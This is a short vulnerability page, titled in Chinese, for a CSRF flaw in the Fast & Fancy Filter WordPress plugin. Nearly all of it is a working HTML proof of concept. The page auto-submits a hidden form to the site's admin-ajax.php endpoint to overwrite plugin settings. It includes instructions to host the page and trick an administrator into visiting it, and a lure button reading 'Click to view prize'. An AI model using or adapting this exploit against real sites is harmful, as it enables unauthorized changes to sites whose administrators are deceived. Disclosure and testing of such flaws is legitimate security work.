CVE-2026-6396: Fast & Fancy Filter插件CSRF漏洞

<!-- PoC for CVE-2026-6396: CSRF in Fast & Fancy Filter Plugin Description: This HTML snippet demonstrates how a forged request can be sent to modify plugin options. Usage: Host this code on a server and trick the admin into visiting the URL. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://target-wordpress-site/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="fff_save_settins" /> <input type="hidden" name="option_name" value="malicious_payload" /> <input type="submit" value="Click to view prize" /> </form> <script> document.forms[0].submit(); </script> </body> </html>